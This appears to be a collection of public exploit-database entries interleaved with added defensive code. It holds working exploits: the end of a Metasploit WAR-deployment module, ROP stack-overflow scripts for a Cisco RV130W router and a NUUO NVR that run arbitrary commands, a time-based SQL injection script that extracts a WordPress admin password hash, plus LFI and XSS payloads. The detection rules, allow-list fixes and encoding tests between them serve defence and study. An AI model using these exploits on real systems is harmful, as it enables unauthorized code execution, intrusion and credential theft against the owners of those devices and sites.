      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortlettargetStyle' => 'Application',
          'AppApplicationInstallPortletfrsc'        => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_finish_action
    action = '/com/bea/console/actions/app/install/finish'

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletname'             => war_payload.name,
          'AppApplicationInstallPortletsecurityModel'    => 'DDOnly',
          'AppApplicationInstallPortletstagingStyle'     => 'Default',
          'AppApplicationInstallPortletplanStagingStyle' => 'Default',
          'AppApplicationInstallPortletfrsc'             => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)

    # 302 is a good enough indicator of a successful upload, otherwise
    # the server would actually return a 200 with an error message.
    res.code == 302
  end

  def print_response_message(res)
    html = res.get_html_document
    message_div = html.at('div[@class="message"]')
    if message_div
      msg = message_div.at('span').text
      print_status("Server replies: #{msg.inspect}")
    end
  end

  def deploy_war
    set_frsc
    print_status("FRSC value: #{frsc}")
    do_select_upload_action
    do_upload_app_action
    do_app_select_action
    do_style_select_action
    do_finish_action
  end

  def goto_war(name)
    print_good("Operation \"#{name}\" is a go!")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, name)
    })

    print_status("Code #{res.code} on \"#{name}\" request") if res
  end

  def undeploy_war
    war_name = war_payload.name
    handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")'
    contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")|
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',
          'AppDeploymentsControlPortlethandle' => handle
        },
      'vars_post' =>
        {
          # For some reason, the value given to the server is escaped twice.
          # The Metasploit API should do it at least once.
          'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),
          '_pageLabel' => 'AppApplicationUninstallPage',
          '_nfpb'      => 'true',
          'AppApplicationUninstallPortletfrsc' => frsc
        }
    })

    if res && res.code == 302
      print_good("Successfully undeployed #{war_name}.war")
    else
      print_warning("Unable to successfully undeploy #{war_name}.war")
      print_warning('You may want to do so manually.')
    end
  end

  def cleanup
    undeploy_war if is_cleanup_ready
    super
  end

  def setup
    @is_cleanup_ready = false
    super
  end

  def exploit
    unless check == Exploit::CheckCode::Detected
      print_status('Target does not have the login page we are looking for.')
      return
    end

    do_login
    print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
    print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
    result = deploy_war
    if result
      @is_cleanup_ready = true
      goto_war(war_payload.name)
    end
  end

  attr_reader :frsc
  attr_reader :is_cleanup_ready
end
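The module's `deploy_war` drives the console's install workflow by POSTing to `console/console.portal` with `AppApplicationInstallPortlet_actionOverride` set to five actions in turn (selectUploadApp, uploadApp, appSelected, targetStyleSelected, finish). That fixed order is something a defender can look for in the admin server's access log. The following is an added detection example, not part of the Metasploit module or of WebLogic; the Common Log Format layout, the sample lines and the client addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Console actions that deploy_war() in the module above drives, in order.
DEPLOY_SEQUENCE = (
    "/com/bea/console/actions/app/install/selectUploadApp",
    "/com/bea/console/actions/app/install/uploadApp",
    "/com/bea/console/actions/app/install/appSelected",
    "/com/bea/console/actions/app/install/targetStyleSelected",
    "/com/bea/console/actions/app/install/finish",
)

# Common Log Format; the layout of the real access log is an assumption.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PORTAL = "/console/console.portal"
ACTION_PARAM = "AppApplicationInstallPortlet_actionOverride"

# Constructed sample: 10.0.0.5 runs the whole workflow, 10.0.0.9 only starts it.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Mar/2019:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5120',
    '10.0.0.5 - - [13/Mar/2019:10:00:02 +0000] "POST /console/j_security_check HTTP/1.1" 302 0',
    '10.0.0.5 - - [13/Mar/2019:10:00:03 +0000] "POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/selectUploadApp HTTP/1.1" 200 8100',
    '10.0.0.5 - - [13/Mar/2019:10:00:04 +0000] "POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/uploadApp HTTP/1.1" 200 8210',
    '10.0.0.5 - - [13/Mar/2019:10:00:05 +0000] "POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/appSelected HTTP/1.1" 200 8300',
    '10.0.0.5 - - [13/Mar/2019:10:00:06 +0000] "POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/targetStyleSelected HTTP/1.1" 200 8300',
    '10.0.0.5 - - [13/Mar/2019:10:00:07 +0000] "POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/finish HTTP/1.1" 302 0',
    '10.0.0.9 - - [13/Mar/2019:10:05:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5120',
    '10.0.0.9 - - [13/Mar/2019:10:05:01 +0000] "POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/selectUploadApp HTTP/1.1" 200 8100',
]


def parse_line(line):
    """Split one access-log line into host, method, path, console action and status.

    Returns None for lines that do not match the expected layout.
    """
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m.group("target"))
    action = parse_qs(url.query).get(ACTION_PARAM, [None])[0]
    return {"host": m.group("host"), "ts": m.group("ts"), "method": m.group("method"),
            "path": url.path, "action": action, "status": int(m.group("status"))}


def find_console_deployments(lines):
    """(host, timestamp) for each client that completed the five-step install workflow.

    Progress is tracked per client: an out-of-order action resets it and a fresh
    selectUploadApp starts a new attempt, so two interleaved attempts do not merge.
    """
    progress = defaultdict(int)
    completed = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not rec["path"].endswith(PORTAL):
            continue
        if rec["action"] is None:
            continue
        step = progress[rec["host"]]
        if rec["action"] == DEPLOY_SEQUENCE[step]:
            step += 1
        elif rec["action"] == DEPLOY_SEQUENCE[0]:
            step = 1
        else:
            step = 0
        if step == len(DEPLOY_SEQUENCE):
            completed.append((rec["host"], rec["ts"]))
            step = 0
        progress[rec["host"]] = step
    return completed


if __name__ == "__main__":
    for host, ts in find_console_deployments(SAMPLE_LOG):
        print(f"{host} completed a console WAR deployment at {ts}")
```

A legitimate administrator deploying through the GUI produces exactly the same sequence, so a hit is a change to reconcile against a ticket rather than proof of compromise. Since the module relies on the default `oats` account, the fix that removes the whole class of finding is disabling or re-keying that account, not tuning the rule.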
            
# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:

http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
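The PoC above walks out of the web root with percent-encoded backslashes (`%5c`), so a check that only looks for `../` misses it. The following is an added example, not IceWarp's code: a detection rule that decodes the value (repeatedly, to catch double encoding) and looks for parent-directory hops in either separator style, and a resolver for the `style` parameter that allow-lists the name and then checks the normalized path stays under its directory. `STYLE_ROOT` and the `.css` suffix are assumptions about the application layout.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed directory for style files; not IceWarp's real layout.
STYLE_ROOT = "/var/www/webmail/calendar/styles"

# The parameter value from the PoC above, as the application receives it.
POC_STYLE = "..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so %255c and %5c look alike."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """Log/WAF rule: a parent-directory hop after decoding, with either separator."""
    normalized = decode_fully(value).replace("\\", "/")
    if "\x00" in normalized:
        return True
    return re.search(r"(^|/)\.\.(/|$)", normalized) is not None


def resolve_style(name, root=STYLE_ROOT):
    """Map a style name to a file under root, or return None.

    Two layers: an allow-list on the name (the actual fix) and a containment
    check on the normalized path (defence in depth if the allow-list is loosened).
    """
    decoded = decode_fully(name).replace("\\", "/")
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", decoded):
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded + ".css"))
    if not candidate.startswith(root.rstrip("/") + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for sample in ("default", POC_STYLE, "..%255c..%255cwindows%255cwin.ini"):
        print(f"{sample!r}: traversal={is_traversal(sample)} path={resolve_style(sample)}")
```

The allow-list is what actually closes the hole; the `startswith` check only guards against a later change that relaxes it. On Windows hosts, where this PoC is aimed, both `/` and `\` are separators, which is why the rule folds backslashes before looking for `..`.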


            
#!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
# 
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; 
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
# 
#   gadget 1    system()   junk   gadget 2   junk  junk  junk  junk  junk   gadget 3    text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'

#!/usr/bin/python
import requests

def banner():
    print '''
              @0x00string
             0000000000000
          0000000000000000000   00
       00000000000000000000000000000
      0000000000000000000000000000000
    000000000             0000000000
   00000000               0000000000
  0000000                000000000000
 0000000               000000000000000
 000000              000000000  000000
0000000            000000000     000000
000000            000000000      000000
000000          000000000        000000
000000         00000000          000000
000000       000000000           000000
0000000    000000000            0000000
 000000   000000000             000000
 0000000000000000              0000000
  0000000000000               0000000
   00000000000              00000000
   00000000000            000000000
  0000000000000000000000000000000
   00000000000000000000000000000
     000  0000000000000000000
             0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
'''

def main():
    banner()
    command = "ping 192.168.1.100\x00"
    print ("Sending exploit to execute [" + command + "]\n")
    rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
    payload = ("Z" * 446) + rop + command
    url = "https://192.168.1.100:443/login.cgi"
    data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
    # 'payload=' is not a requests keyword; verify=False matches the -k in the curl line above
    r = requests.post(url, data=data, verify=False)

if __name__ == "__main__":
    main()
            
#!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
#   [ leading / ]
#   [ Padding x 335 ]
#   [ original value at stack pointer + 158 ]
#   [ padding x 80 ]
#   [ address of (pop {r3,lr} ; bx lr) ]
#   [ system() address ]
#   [ address of (mov r0,sp ; blx r3) ]
#   [ command to execute ]

import getopt
import sys
from socket import socket, AF_INET, SOCK_STREAM

def banner():
    print '''
              @0x00string
             0000000000000
          0000000000000000000   00
       00000000000000000000000000000
      0000000000000000000000000000000
    000000000             0000000000
   00000000               0000000000
  0000000                000000000000
 0000000               000000000000000
 000000              000000000  000000
0000000            000000000     000000
000000            000000000      000000
000000          000000000        000000
000000         00000000          000000
000000       000000000           000000
0000000    000000000            0000000
 000000   000000000             000000
 0000000000000000              0000000
  0000000000000               0000000
   00000000000              00000000
   00000000000            000000000
  0000000000000000000000000000000
   00000000000000000000000000000
     000  0000000000000000000
             0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
'''

def usage ():
    print   ("python script.py <args>\n"
            "   -h, --help:             Show this message\n"
            "   -a, --rhost:            Target IP address\n"
            "   -b, --rport:            Target Port - default 5150\n"
            "   -c, --command:          Command to execute\n"
            "\n"
            "Example:\n"
            "python script.py -a 10.10.10.10\n"
            "python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
    exit()

def main():
    rhost = None;
    rport = "5150";
    command = "{/bin/touch,/tmp/hax}"
    banner()
    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a','--rhost'):
            rhost = arg;
        elif opt in ('-b','--rport'):
            rport = arg;
        elif opt in ('-c','--command'):
            command = arg;
    if rhost is None:
        usage()
    print ("Sending exploit to execute [" + command + "]\n")
    # parenthesised so the concatenation may span lines
    buf = ("GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
           "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
           "http://" + rhost + ":" + rport + "\r\n\r\n")
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(30)
    sock.connect((rhost, int(rport)))
    sock.send(buf)
    print ("done\n")

if __name__ == "__main__":
    main()
            
# Exploit Title: AUO Solar Data Recorder - Incorrect Access Control
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO Solar Data Recorder all versions prior to v1.3.0
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: CVE-2019-11367

# 1. Description:
# The AUO Solar Data Recorder web interface uses HTTP Basic Access Authentication.
# When a user requests files under the path http://<host>/protect/,
# the response carries the plaintext account name and password in the WWW-Authenticate header.
# An attacker can then log in to the AUO Solar Data Recorder with those credentials.

# 2. Proof of Concept:
# Request the files under the path http://<host>/protect/ on the AUO Solar Data Recorder.
# The site uses HTTP Basic Access Authentication,
# and returns the plaintext account name and password in the WWW-Authenticate header.
# Using the account and password from that HTTP response,
# anyone can log in to the AUO Solar Data Recorder.
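The advisory describes a Basic challenge that carries the very credentials it is meant to protect. As an added example, not the vendor's or the advisory's code: a parser for `WWW-Authenticate` values using the auth-param syntax of RFC 7235, and an audit rule that flags any Basic challenge whose parameters go beyond `realm` and `charset` (the two RFC 7617 defines), whose parameter names look like credential fields, or whose realm has a `user:password` shape. The sample headers are constructed for illustration and do not reproduce the device's actual output, which the advisory does not show.

```python
import re

# Parameters a Basic challenge is defined to carry (RFC 7617); anything else is a finding.
EXPECTED_BASIC_PARAMS = {"realm", "charset"}
CREDENTIAL_NAME_RE = re.compile(r"user|login|account|pass|pwd|secret", re.I)
# auth-param = token "=" ( token / quoted-string ), per RFC 7235
AUTH_PARAM_RE = re.compile(r'''([!#$%&'*+.^_`|~\w-]+)\s*=\s*("(?:[^"\\]|\\.)*"|[^\s,]+)''')

# Constructed headers; the advisory does not show the device's real format.
NORMAL_CHALLENGE = 'Basic realm="Solar Data Recorder", charset="UTF-8"'
LEAKY_REALM = 'Basic realm="admin:secret123"'
LEAKY_PARAMS = 'Basic realm="device", username="admin", password="1234"'


def parse_challenge(header):
    """Return (scheme, {param: value}) for one WWW-Authenticate challenge."""
    scheme, _, rest = header.strip().partition(" ")
    params = {}
    for name, raw in AUTH_PARAM_RE.findall(rest):
        # strip the quotes of a quoted-string and undo its backslash escapes
        value = raw[1:-1].replace('\\"', '"') if raw.startswith('"') else raw
        params[name.lower()] = value
    return scheme, params


def audit_challenge(header):
    """Findings for a Basic challenge that discloses more than a realm name."""
    scheme, params = parse_challenge(header)
    findings = []
    if scheme.lower() != "basic":
        return findings   # only Basic challenges are audited here
    for name, value in params.items():
        if name not in EXPECTED_BASIC_PARAMS:
            findings.append(f"unexpected parameter {name!r} in Basic challenge")
        if CREDENTIAL_NAME_RE.search(name):
            findings.append(f"parameter {name!r} looks like a credential field")
        if name == "realm" and re.fullmatch(r"[^:\s]+:\S+", value):
            findings.append("realm has user:password shape")
    return findings


if __name__ == "__main__":
    for header in (NORMAL_CHALLENGE, LEAKY_REALM, LEAKY_PARAMS):
        print(header, "->", audit_challenge(header) or "ok")
```

Run the audit over the response headers a scanner or proxy records for every `401`; a Basic challenge should never carry anything a client could use to answer it. Basic authentication over plain HTTP also sends the credentials base64-encoded on every request, so even a clean challenge on this device leaves them readable on the wire unless TLS is in front of it.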
            
# -*- coding: utf-8 -*-
# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
# Date: 22-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://10web.io/plugins/
# Software Link: https://wordpress.org/plugins/form-maker/
# Version: 1.13.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2019-10866

import requests
import time

url_vuln = 'http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc='
session = requests.Session()
dictionary = '@._-$/\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
flag = True
username = "username"
password = "password"
temp_password = ""
TIME = 0.5

def login(username, password):
    payload = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Login',
        'redirect_to': 'http://localhost/wordpress/wp-admin/',
        'testcookie': 1
    }
    session.post('http://localhost/wordpress/wp-login.php', data=payload)

def print_string(str):
    print "\033c"
    print str

def get_admin_pass():
    len_pwd = 1
    global flag
    global temp_password
    while flag:
        flag = False
        ch_temp = ''
        for ch in dictionary:
            print_string("[*] Password dump: " + temp_password + ch)
            ch_temp = ch
            start_time = time.time()
            r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            temp_password += ch_temp
            len_pwd += 1

login(username, password)
get_admin_pass()
print_string("[+] Password found: " + temp_password)
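The script above works because the `asc_or_desc` value ends up concatenated into an `ORDER BY` clause, and it recovers the hash one character per request by timing a `sleep()`. The following is an added example, not the plugin's code: the allow-list check that closes the hole (sort identifiers cannot be bound as query parameters, so the only safe input is one of a fixed set), plus a log-side rule that flags timing primitives in decoded query values and counts probes per client, since an extraction loop like the one above produces dozens of near-identical requests. The column names, client addresses and request list are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed set of sortable submission columns; the plugin's real list is not on the page.
ALLOWED_ORDER_COLUMNS = {"group_id", "id", "date"}
ALLOWED_DIRECTIONS = {"asc", "desc"}

# One request from the loop in the script above (guessing character code 36 at position 1).
PROBE_URL = ("http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm&task=display"
             "&current_id=2&order_by=group_id&asc_or_desc=,(case+when+(select+ascii(substring("
             "user_pass,1,1))+from+wp_users+where+id%3d1)%3d36+then+(select+sleep(0.5)+from+"
             "wp_users+limit+1)+else+2+end)+asc%3b")
INJECTED_DIRECTION = parse_qs(urlsplit(PROBE_URL).query)["asc_or_desc"][0]


def build_order_clause(order_by, asc_or_desc):
    """The fix: validate both halves against a fixed set and never interpolate raw input."""
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unsupported order column: {order_by!r}")
    direction = asc_or_desc.strip().lower()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {asc_or_desc!r}")
    return f"ORDER BY {order_by} {direction.upper()}"


def order_clause_or_none(order_by, asc_or_desc):
    """Convenience wrapper: None instead of an exception for rejected input."""
    try:
        return build_order_clause(order_by, asc_or_desc)
    except ValueError:
        return None


# Timing primitives across common engines: the tell-tale of time-based blind probing.
TIME_BASED_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)


def suspicious_params(url):
    """Names of decoded query parameters that carry a timing primitive."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [name for name, values in qs.items()
            if any(TIME_BASED_RE.search(v) for v in values)]


def blind_probe_sources(requests, threshold=20):
    """(client, parameter) pairs that sent at least `threshold` timing probes.

    One request per guessed character means a real extraction run crosses the
    threshold quickly while a single scanner signature does not.
    """
    counts = {}
    for client, url in requests:
        for name in suspicious_params(url):
            counts[(client, name)] = counts.get((client, name), 0) + 1
    return sorted(key for key, n in counts.items() if n >= threshold)


# Constructed traffic: 25 probes from one client, one legitimate sort request from another.
SAMPLE_REQUESTS = [("203.0.113.7", PROBE_URL.replace("%3d36", f"%3d{code}"))
                   for code in range(33, 58)]
SAMPLE_REQUESTS.append(("198.51.100.4",
                        "http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm"
                        "&task=display&current_id=2&order_by=group_id&asc_or_desc=desc"))

if __name__ == "__main__":
    print(build_order_clause("group_id", "DESC"))
    print("rejected:", order_clause_or_none("group_id", INJECTED_DIRECTION))
    print("probe sources:", blind_probe_sources(SAMPLE_REQUESTS))
```

The detection rule is deliberately narrow (a timing function in a decoded parameter) so that it stays quiet on ordinary admin traffic; the per-client count is what turns one suspicious request into an incident worth paging on. In WordPress code the same allow-list belongs in the handler before `$wpdb` sees the value, because `ORDER BY` cannot be parameterised with `prepare()`.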
            
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12542


An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.


Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site

PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view
            
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12543


Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.


Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl


PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view
            
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12538


Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter.


Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME=

PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view
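All three advisories above are the same defect: a request parameter reflected into the page without output encoding, in one case inside a text node (`serviceRequestId`) and in the others by breaking out of a quoted attribute (`userConfigID`, `SELECTSITE`). The following is an added example, not ServiceDesk Plus code, showing a vulnerable and a hardened rendering of one template and checking both with Python's HTML parser by listing the elements a browser-like parser would see. The template and the reflection contexts are assumptions; the values are the page's own attack vectors, percent-decoded.

```python
import html
from html.parser import HTMLParser

# The reflected values from the three advisories above, percent-decoded as the server sees them.
VECTORS = [
    "21111111ucgol\"><img src=a onerror=alert('XSS')>qzmm3u7id8z",   # SearchN.do userConfigID
    "g24aj<img src=a onerror=alert('XSS')>qdaxl",                    # PurchaseRequest.do serviceRequestId
    "qc_siteID\"/><svg onload=alert('XSS')>",                        # SiteLookup.do SELECTSITE
]


def render_unsafe(value):
    """Reflect the value into a text node and a quoted attribute with no encoding (the bug)."""
    return f'<span class="q">{value}</span><input type="hidden" name="v" value="{value}">'


def render_safe(value):
    """Same template with entity encoding; quote=True also encodes the quote characters,
    which is what stops the attribute break-out in the first and third vectors."""
    enc = html.escape(value, quote=True)
    return f'<span class="q">{enc}</span><input type="hidden" name="v" value="{enc}">'


class _TagCollector(HTMLParser):
    """Records every start tag, including self-closing ones, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(fragment):
    """Element names the parser sees; the template itself contributes exactly span and input."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def injected_elements(fragment):
    """Any element beyond the template's own two is attacker-controlled markup."""
    return [tag for tag in start_tags(fragment) if tag not in ("span", "input")]


if __name__ == "__main__":
    for value in VECTORS:
        print(f"unsafe: {injected_elements(render_unsafe(value))}  "
              f"safe: {injected_elements(render_safe(value))}")
```

Encoding has to match the context the value lands in: `html.escape(..., quote=True)` covers text nodes and quoted attributes, which is enough for this template, but a value placed in an unquoted attribute, a URL, or a script block needs the encoder for that context instead. The parser check is a cheap regression test to keep beside the template so that a later edit cannot quietly reintroduce raw interpolation.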